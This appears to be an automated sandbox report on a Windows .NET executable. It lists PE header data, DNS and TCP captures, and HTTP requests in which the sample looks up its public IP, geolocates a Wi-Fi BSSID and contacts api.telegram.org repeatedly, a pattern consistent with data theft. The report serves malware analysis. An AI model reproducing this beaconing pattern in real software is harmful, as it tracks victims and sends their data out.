                                                                                                                                                            Entrypoint:0x42bd3e
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0xBBAE67A1 [Sat Oct 12 02:06:25 2069 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                            Entrypoint Preview

                                                                                                                                                            Instruction
                                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al

                                                                                                                                                            Data Directories

                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2bce40x57.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x596.rsrc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000xc.reloc
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                            Sections

                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                            .text0x20000x29d440x29e00False0.46538013059701494data5.952376276556654IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                            .rsrc0x2c0000x5960x600False0.4134114583333333data4.029504312109572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                            .reloc0x2e0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                            Resources

                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                            RT_VERSION0x2c0a00x30cdata0.4269230769230769
                                                                                                                                                            RT_MANIFEST0x2c3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                            Imports

                                                                                                                                                            DLLImport
                                                                                                                                                            mscoree.dll_CorExeMain

                                                                                                                                                            Network Behavior

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jun 23, 2023 21:21:37.298836946 CEST4971480192.168.2.6104.18.114.97
                                                                                                                                                            Jun 23, 2023 21:21:37.316077948 CEST8049714104.18.114.97192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.316273928 CEST4971480192.168.2.6104.18.114.97
                                                                                                                                                            Jun 23, 2023 21:21:37.316687107 CEST4971480192.168.2.6104.18.114.97
                                                                                                                                                            Jun 23, 2023 21:21:37.333679914 CEST8049714104.18.114.97192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.339109898 CEST8049714104.18.114.97192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.385437965 CEST4971480192.168.2.6104.18.114.97
                                                                                                                                                            Jun 23, 2023 21:21:37.511271954 CEST49715443192.168.2.6172.67.196.114
                                                                                                                                                            Jun 23, 2023 21:21:37.511320114 CEST44349715172.67.196.114192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.511410952 CEST49715443192.168.2.6172.67.196.114
                                                                                                                                                            Jun 23, 2023 21:21:37.532217979 CEST49715443192.168.2.6172.67.196.114
                                                                                                                                                            Jun 23, 2023 21:21:37.532255888 CEST44349715172.67.196.114192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.586302042 CEST44349715172.67.196.114192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.586432934 CEST49715443192.168.2.6172.67.196.114
                                                                                                                                                            Jun 23, 2023 21:21:37.594124079 CEST49715443192.168.2.6172.67.196.114
                                                                                                                                                            Jun 23, 2023 21:21:37.594161034 CEST44349715172.67.196.114192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.594602108 CEST44349715172.67.196.114192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.635453939 CEST49715443192.168.2.6172.67.196.114
                                                                                                                                                            Jun 23, 2023 21:21:37.765336990 CEST49715443192.168.2.6172.67.196.114
                                                                                                                                                            Jun 23, 2023 21:21:37.808288097 CEST44349715172.67.196.114192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.841154099 CEST44349715172.67.196.114192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.841254950 CEST44349715172.67.196.114192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.841315985 CEST49715443192.168.2.6172.67.196.114
                                                                                                                                                            Jun 23, 2023 21:21:37.846323967 CEST49715443192.168.2.6172.67.196.114
                                                                                                                                                            Jun 23, 2023 21:21:37.879044056 CEST49716443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:37.879098892 CEST44349716149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.879180908 CEST49716443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:37.879992962 CEST49716443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:37.880018950 CEST44349716149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.953787088 CEST44349716149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.953962088 CEST49716443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:37.967400074 CEST49716443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:37.967427969 CEST44349716149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.967935085 CEST44349716149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.970726967 CEST49716443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:37.970786095 CEST44349716149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:38.148220062 CEST44349716149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:38.148248911 CEST44349716149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:38.148339033 CEST44349716149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:38.148376942 CEST49716443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:38.148408890 CEST49716443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:38.149099112 CEST49716443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:38.161748886 CEST49717443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:38.161804914 CEST44349717149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:38.161886930 CEST49717443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:38.162452936 CEST49717443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:38.162470102 CEST44349717149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:38.223362923 CEST44349717149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:38.227447987 CEST49717443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:38.227477074 CEST44349717149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:38.429721117 CEST44349717149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:38.429860115 CEST44349717149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:38.429968119 CEST49717443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:38.430852890 CEST49717443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.164489985 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.164565086 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.164660931 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.167599916 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.167624950 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.230854988 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.234523058 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.234555960 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.280616999 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.281328917 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.281393051 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.283679008 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.283704996 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.283926010 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.283963919 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284044981 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284061909 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284131050 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284149885 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284311056 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284334898 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284424067 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284454107 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284533978 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284559965 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284671068 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284689903 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284759998 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284780025 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.284888029 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.284909010 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.285005093 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.285024881 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.285116911 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.285137892 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.285222054 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.285273075 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.285343885 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.285366058 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.288520098 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:41.288542986 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.604988098 CEST4971480192.168.2.6104.18.114.97
                                                                                                                                                            Jun 23, 2023 21:21:41.622309923 CEST8049714104.18.114.97192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:41.622461081 CEST4971480192.168.2.6104.18.114.97
                                                                                                                                                            Jun 23, 2023 21:21:42.061414003 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.061712980 CEST44349718149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.061791897 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.062531948 CEST49718443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.108527899 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.108588934 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.108680964 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.109625101 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.109652996 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.171897888 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.176506996 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.176553965 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.224705935 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.225384951 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.225425959 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.225552082 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.225578070 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.226052999 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.226102114 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.226212025 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.226243973 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.226567030 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.226614952 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.227319956 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.227359056 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.227695942 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.227734089 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.228063107 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.228105068 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.228400946 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.228432894 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.228754044 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.228791952 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.229181051 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.229239941 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.229581118 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.229617119 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.229909897 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.229943991 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.230346918 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.230384111 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.230679989 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.230710030 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.231071949 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.231123924 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.365184069 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.365300894 CEST44349719149.154.167.220192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.365379095 CEST49719443192.168.2.6149.154.167.220
                                                                                                                                                            Jun 23, 2023 21:21:42.366830111 CEST49719443192.168.2.6149.154.167.220

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jun 23, 2023 21:21:37.103121996 CEST6291053192.168.2.68.8.8.8
                                                                                                                                                            Jun 23, 2023 21:21:37.131951094 CEST53629108.8.8.8192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.253684998 CEST6386353192.168.2.68.8.8.8
                                                                                                                                                            Jun 23, 2023 21:21:37.288489103 CEST53638638.8.8.8192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.481709003 CEST6322953192.168.2.68.8.8.8
                                                                                                                                                            Jun 23, 2023 21:21:37.509968042 CEST53632298.8.8.8192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:37.854080915 CEST6253853192.168.2.68.8.8.8
                                                                                                                                                            Jun 23, 2023 21:21:37.877794027 CEST53625388.8.8.8192.168.2.6
                                                                                                                                                            Jun 23, 2023 21:21:42.092143059 CEST5490353192.168.2.68.8.8.8
                                                                                                                                                            Jun 23, 2023 21:21:42.107374907 CEST53549038.8.8.8192.168.2.6

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Jun 23, 2023 21:21:37.103121996 CEST192.168.2.68.8.8.80x27c7Standard query (0)202.200.1.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                            Jun 23, 2023 21:21:37.253684998 CEST192.168.2.68.8.8.80x5f30Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                                                                                            Jun 23, 2023 21:21:37.481709003 CEST192.168.2.68.8.8.80x3edbStandard query (0)api.mylnikov.orgA (IP address)IN (0x0001)false
                                                                                                                                                            Jun 23, 2023 21:21:37.854080915 CEST192.168.2.68.8.8.80xd212Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                            Jun 23, 2023 21:21:42.092143059 CEST192.168.2.68.8.8.80x6a79Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Jun 23, 2023 21:21:37.131951094 CEST8.8.8.8192.168.2.60x27c7Name error (3)202.200.1.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                            Jun 23, 2023 21:21:37.288489103 CEST8.8.8.8192.168.2.60x5f30No error (0)icanhazip.com104.18.114.97A (IP address)IN (0x0001)false
                                                                                                                                                            Jun 23, 2023 21:21:37.288489103 CEST8.8.8.8192.168.2.60x5f30No error (0)icanhazip.com104.18.115.97A (IP address)IN (0x0001)false
                                                                                                                                                            Jun 23, 2023 21:21:37.509968042 CEST8.8.8.8192.168.2.60x3edbNo error (0)api.mylnikov.org172.67.196.114A (IP address)IN (0x0001)false
                                                                                                                                                            Jun 23, 2023 21:21:37.509968042 CEST8.8.8.8192.168.2.60x3edbNo error (0)api.mylnikov.org104.21.44.66A (IP address)IN (0x0001)false
                                                                                                                                                            Jun 23, 2023 21:21:37.877794027 CEST8.8.8.8192.168.2.60xd212No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                            Jun 23, 2023 21:21:42.107374907 CEST8.8.8.8192.168.2.60x6a79No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • api.mylnikov.org
                                                                                                                                                            • api.telegram.org
                                                                                                                                                            • icanhazip.com

                                                                                                                                                            HTTP Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.649715172.67.196.114443C:\Users\user\Desktop\file.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            1192.168.2.649716149.154.167.220443C:\Users\user\Desktop\file.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            2192.168.2.649717149.154.167.220443C:\Users\user\Desktop\file.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            3192.168.2.649718149.154.167.220443C:\Users\user\Desktop\file.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            4192.168.2.649719149.154.167.220443C:\Users\user\Desktop\file.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            5192.168.2.649714104.18.114.9780C:\Users\user\Desktop\file.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Jun 23, 2023 21:21:37.316687107 CEST0OUTGET / HTTP/1.1
                                                                                                                                                            Host: icanhazip.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Jun 23, 2023 21:21:37.339109898 CEST1INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 23 Jun 2023 19:21:37 GMT
                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                            Content-Length: 11
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            Access-Control-Allow-Methods: GET
                                                                                                                                                            Set-Cookie: __cf_bm=fXcoSWtMkOYIH39T6zK8200e6fvh9EDfFnws0._Gtog-1687548097-0-AYWZbmWoVgmag1UTe8qwJTYV9BcjsLEkpaEjFs3s0pLIsxiJT+slk9VPHcXBLiAsJMLGUSZ2soOGi0coDJzLl5Q=; path=/; expires=Fri, 23-Jun-23 19:51:37 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 7dbf18583bb090dc-FRA
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            Data Raw: 38 34 2e 31 37 2e 35 32 2e 35 0a
                                                                                                                                                            Data Ascii: 84.17.52.5


                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            0192.168.2.649715172.67.196.114443C:\Users\user\Desktop\file.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2023-06-23 19:21:37 UTC0OUTGET /geolocation/wifi?v=1.1&bssid=00:0c:29:82:cb:33 HTTP/1.1
                                                                                                                                                            Host: api.mylnikov.org
                                                                                                                                                            Connection: Keep-Alive
